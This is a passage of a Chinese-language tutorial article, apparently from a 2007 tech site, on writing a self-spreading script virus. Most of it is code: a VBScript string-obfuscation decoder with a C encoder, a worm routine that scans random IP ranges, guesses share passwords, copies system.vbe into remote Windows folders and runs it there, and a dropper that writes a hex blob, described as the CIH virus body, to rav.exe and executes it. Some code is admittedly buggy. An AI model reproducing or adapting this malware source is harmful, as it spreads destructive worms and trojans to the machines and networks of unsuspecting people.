教你写超级脚本病毒-网络安全专区

教你写超级脚本病毒

作者：IT168 编辑：李莲 2007-06-22 19:29

(2).病毒要尽可能的用到变形功能，使用新的加密算法，当然脚本的加密算法是很简单的，在这一点上新欢乐时光
就做的很好.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
下面给出一个c的示例（程序有点问题，请老师指教一下^_^）

#include <string.h>
#include <stdio.h>
main()
{
    FILE *in,*out,*read;
    char *exc="Execute DeCode(\\"";
    char *excu="\\")\\n";
    char *func="Function DeCode(Coded)\\nFor i=1 To Len(Coded)\\nCurchar=Mid(Coded,i,1)\\n";
    char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\\n";
    char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\\nElse Curchar=chr(Asc(Curchar)-2)\\nend if\\nDeCode=Decode & Curchar\\nNext\\nEnd function\\n";
    char buf[100][101];
    char name[30];
    char ch;
    char *p;
    int i=0,j=0;
    gets(name);
    if((in=fopen(name,"r+"))==NULL)
    {
printf("Can\''t open the file %",name);
exit(0);
    }
    ch=getc(in);
    while(!feof(in))
    {
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
    }
    fclose(in);
    read=fopen(name,"r+");
    do
    {
       if(i>=100)
       {
  fclose(in);
       }
       p=fgets(buf,80,in);
       i++;
    }while(p!=NULL);
    fclose(read);
    out=fopen(name,"w+");
    fputs(exc,out);
    for(;j<i-1;j++)
    {
       fputs(buf[j],out);
    }
    fputs(excu,out);
    fputs(func,out);
    fputs(funct,out);
    fputs(functi,out);
    fclose(out);
}

2, 病毒的攻击性可以扩展到有系统漏洞的主机上，蠕虫可以利用一些基本的DOS命令和第三方黑客工具来进行漏洞攻击

3，病毒利用邮件和局域网进性传播：

攻击局域网可以采用简化的network代码，并利用vmi直接在远程主机上运行病毒体，且可以破译共享密码(穷解破解的话,太费时间,
也没什么必要)：
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+"ript.n"+"etwork")
set qq=createobject("WSc"+"ript.S"+"hell")
on error resume next
randomize
randaddress()

do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
net.mapnetworkdrive "I:", "\\\\" & "name" &"\\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(net.Body, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
’破译共享密码
enumdrives()
loop
copy()
disconnectdrive()
qq "\\\\name\\con\\con",0
run ()
loop
end sub

function run()
Dim Controller, RemoteScript
Set Controller = WScript.CreateObject("WSHC"+"ontroller")
Set RemoteScript = Controller.CreateScript("system.vbe", "name")
WScript.ConnectObject RemoteScript, "remote_"
RemoteScript.Execute

Do While RemoteScript.Status <> 2
WScript.Sleep 100
Loop

WScript.DisconnectObject RemoteScript
remote_Error()
end function

Sub remote_Error
Dim theError
Set theError = RemoteScript.Error
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description
WScript.Quit -1
End Sub

Function disconnectdrive()
net.removenetworkdrive "I:"
driveconnected = "0"
end function

Function copy()
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\"
yu.copyfile dir2&"\\system.vbe", "I:\\windows\\system32\\"
yu.copyfile dir2&"\\system.vbe", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\winnt\\system32\\"
yu.copyfile dir2&"\\system.inf", "I:\\windows\\system32\\"
’复制到对方的机器上。
end function

Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function

Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function

Function enumdrives()
set you=net.enumnetworkdrives
For p = 0 to you.Count -1
if name = you.item(p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function

Function randum()
rand = int((254 * rnd) + 1)
end function

Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function

4，蠕虫体内可以携带其他病毒体或木马，看下面一例：
Sub kill()
Set yu=CreateObject("Scrip"+"ting.F"+"ileSys"+"temOb"+"ject")
Set aa=CreateObject("WSc"+"ript.S"+"hell")
bb = "4D5A000300000004000000FFFF0000000000000000004000000000000000000000000000000000000000000000000000000000000000000
00000800000000E1F3F003F3F3F4C3F546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240
0000000000055504500004C01040066553F0000000000000000000E010B01023200020000000C00000000000040020000001000000020000000004
0000010000000020000010000000000000004000000000000000050000000040000470000020000000000100000100000000010000010000000000
000100000000000000000000000002000000000000030000004070000000000000000000000000000000000000040000014000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000050207400000000020000001000000002000000040000000000000000000000000000600000602E6964617461
000000020000002000000002000000060000000000000000000000000000400000402E727372630000000010000000300000000800000008000000
0000000000000000000000400000402E72656C6F63000034000000004000000002000000100000000000000000000000000000400000422E727372
63000000802B000000000100000000000000003F4000550100003F40003F0000558D44243FDB643F000000005B8D4B425150500F014C24FE5B83C3
1CFA8B2B668B6BFC8D711256668973FCC13F668973025ECC568BF08B48FCF3A4833F3F0BF67402EBF05ECCFB33DBEB0733DB643F3F643F585D680C
104000C374320F21C1E3103F241566896BFCC13F66896B023F23C36A0F516AFF5151516A016A023F5300010083C420978D469DCF8D87E7FCFFFF50
3F670040000F23C0588B4E3D3F8950FC8D40D68901FAEBB653000000005B83C324533F6800400058FF742408FF53FC595053FF53FC590F23C0585BC
3561702C060000000005E81C6130300003F010F3F0200008D5C24283F240F85F50100003F83C605568A43043CFF740804403F3F46466A006A7F8B5B
108B430C83C00450563F4100400083C410817C063F4558455E0F85B601000066837B18010F85AB0100006600433F320040000F829B010000518BBE5
23FFF3FF6C1017408663F43333F3FC0B43F3FD2428BDA43FFD793599CF63F7406663F43FFD79D0F8262010000569C833F33C0B4D68BE86A04596A3C
5AFFD78B164A8BC5FFD7813E005045000F3F010000536A006A016D737061696E742E65786500558BEC83EC4456FF155C2040008BF0003C227513463
F84C074043C2275F5803E22750D463F3C207E0646803E207FFA803E00740B803E207F0646803E0075F5C745000000008D45BC50FF1558204000F645
3F3F00000074040FB745EC50566A006A00FF1564204000503F0000005E8BE55D3F7424106A00FF74241468001040006A006A00FF156C2040006A00F
F156020400033C0C2100052570F23CC508BC5B15283C207FFD78D4222503F500FB7460E8D5410123F3FF6E18D76325052564151C1E10351033F3F4E
1CF7D14151918B463F46FC8986AD3FFF663F24007C7B8BC5FFD7956A0459528B563C83C212FFD7813E6E5A697074675A5B5F595703D55203EE558D4
43DFC89185303D7528DBE4F3FFF578956CE8D56D8BD3F00003F83C2288B5A102B5A08762C5383E8083F8B5A14035A0853578B5A08035A0C035EFC89
58043F015A08814A24400000402BEB760E03FBE23F21CCEB3383C43CEB4A0128016C240833DB8958FC8D869F3FFF3F66003F8B943FFFFFFF8950020
FB6943126FFFFFF2BC2E23F21C88B58103F593F8BF13F00005A59FFD7EBF05B58F99C33C0B43FD79D5E73318BDF663F438B4EFC8B7E3FD3FE4EFB61
0F213F208BDCFF7338FF53245989431C837B282475068B41283C200000ACDE1B32FFFFFFFF3F00005820000050200000433F32FFFFFFFF3F00006C
20000000000000000000000000000000000000000000003F00003F00003F000074200000000000003F000000000000D076F7BFC1A0F8BF2AB0F83F7
6F7BF000000001192DE7F00000000004765744D6F64756C6548616E646C65410000240147657453746172747570496E666F410000476574436F6D6D
616E644C696E65410071004578697450726F63657373004B45524E454C33322E646C6C00004E005368656C6C4578656375746541005348454C4C333
22E646C6C0089460161C3B007E670E471342675D366BDF80C8D76C5BF4C38008066BAFE0C3FD666BF58004A66C74608240FFFD68D5EF4B855550E00
B9AA2A0E00FFD3C6006051E2FE32E4880091E2FEB855550F0059B5AAFFD3C60020E2FEB4E00066C746080C10FF3FDBB7805383EC2C68001000C0B70
85351515168010500404151518BF481EC0000003F0400100066837E06177405FE464DEBEE015E10C6464D80EBE53F3F00803F3FC39787D5EF9787D5
3F449787D5EF9787D5EE003A6627530001006800400041004000320040004349482076312E3420544154554E4700000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000001097660A040000000000030003000000
280000800E000000400000801000000058000080000000001097660A04000000000001000100000070000080000000001097660A040000000000010
001000000000080000000001097660A040000000000010001000000000080000000001097660A040000000000010004040000000000000000001097
660A040000000000010004040000000000000000001097660A0400000000000100040400000000003F00003F00003F0000000000003F00001400000
03F0000000000003F0000200300003F0000000000002800000020000000400000000100040000000000000200000000000000000000000000000000
000000000000000080000080000000808000800000008000800080800000C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0
000FFFFFF00000000000000000000000000000000000000000000003333333333300000000000000000037B7B7B7B7B7B733300000000000008B7B7
B7B44444B7B73F0000000000FB7B7B7B4CCCCC447B7B73300000000FB7B7B7B7CCCCCCCC47B7B730000000FB7B7B7B7BCCCCCCCC4B7B7B3300000FB
7B71117B7BCCCCCC4B7B7B700000B7B7199911B7B7CCC7B7B7B7B730000B7B719999991B7B7B7B7B7B7B700007B7B99993F7B7B7B7B7B7B7B730000
B7B7999991B7B7B70007B7B7000F7B7B7999917B7B7B3000007B7B73000FB7B7B79997B7B7B30000073F000F7B7B7B7B7B7B7B73000C00077730000
F3F2227B7B7B7B300003F7300000F722A2A227B7B7B7730000C088000000FB2A2A2A227B7B7B77333700000000F7B2A2A2A2B7B7B7B7B7B730F0000
000FB7A2A2A2B7B7B7B7B7B7300000000F7B7A2A7B7B7B7B7B7B7300000F000000F7B7B7B7B75555B7B730000000000000FB7B7B7B55DDD55B7B3000
0000000000F7B7B7B5DDDDDD57000000000F00007F7B7BDDDDDDD57B730000000000000FB7B7BDDDDDD53F000000000000000F7B7BDDDDDD7B7B3000
00000000000000F7B7B7B7B7B70000000000000000000FFF7B7B7B77300000000000000000000007FFFFFF7000000000000000000000000000000000
000000000000000000000000000000000000000000000000FCF001FF00003F00000F00000700000300000300000100000100000180000001800000018
0000001000006010000030300001103000018070000000F0000001F0000001F000000000001C7800003E1800003F0800007F0800007F8C0000FFCC000
0FFCE0001FFDF0003FFF007FFF3FFFFFFFFFFFFF00000100010020201000010004003F00000100200334000000560053005F005600450052005300490
04F004E005F0049004E0046004F00000000003FEFFE00000100000004003F0000000004003F00003F0000000000000001000100010000000000000000
0000000000000080020000010053007400720069006E006700460069006C00650049006E0066006F0000005C020000010030003400300034003000340
04200300000004C001600010043006F006D00700061006E0079004E0061006D006500000000004D006900630072006F0073006F006600740020004300
6F00720070006F0072006100740069006F006E00000040000C000100460069006C0065004400650073006300720069007000740069006F006E0000000
000570069006E0064006F00770073002000BF8A7282E4760000340009000100460069006C006500560065007200730069006F006E000000000034002E
00300030002E00390035003000000000002F000700010049006E007400650072006E0061006C004E0061006D006500000050006200720075007300680
0000000007000260001004C006500670061006C0043006F007000790072006900670068007400000043006F00700079007200690067006800740020006
30020004D006900630072006F0073006F0066007400200043006F00720070002E00200031003900390031002D00310039003900350000003F000B0001
004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000005000420052005500530048002E00450058004500000000006C
0025000100500072006F0064007500630074004E0061006D006500000000004D006900630072006F0073006F006600740052002000570069006E0064
006F0077007300520020004F007000650072006100740069006E0067002000530079007300740065006D0000000000380009000100500072006F0064
00750063007400560065007200730069006F006E00000034002E00300030002E0039003500300000000000440000000100560061007200460069006C
00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E000000000004043F50414444494E47585850
414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E
47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E475041
4444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E4758585041444449
4E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850
4144001000001400000015305B3076303F3F3F0000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000"
vv = they(bb)
Set tt = yu.createtextfile(yu.getspecialfolder(0) & "\\rav.exe",true)
tt.write vv
tt.close
aa.run yu.getspecialfolder(0) & "\\rav.exe", 1, false
they(our)
end sub

Function they(our)
For mine = 1 To Len(our) Step 2
they = they & Chr("&h" & Mid(our, mine, 2))
Next
End Function
上面bb=" "中间一堆的十六进制代码就是CIH病毒体,也可以携带其他的病毒体或木马程序，你可以先用c写一段代码，把*.exe转化成16进制的形式，
写入不病毒体内，然后用function they(our)函数将气还原并运行之^_^ 下面给出一个c的示例:

#include <string.h>
#include <stdio.h>
main()
{
    FILE *fp;
    char letter[250];
    int i,lenth;
    gets(letter);
    if((fp=fopen("c:\\\\letter.txt","w+"))==NULL)
    {
printf("Can\''t open the file.\\n");
exit(1);
    }
    for(i=0;i<strlen(letter);i++)
fprintf(fp,"%x00",letter,fp);
    fclose(fp);
}

第1页：教你写超级脚本病毒第2页：教你写超级脚本病毒第3页：教你写超级脚本病毒

关注我们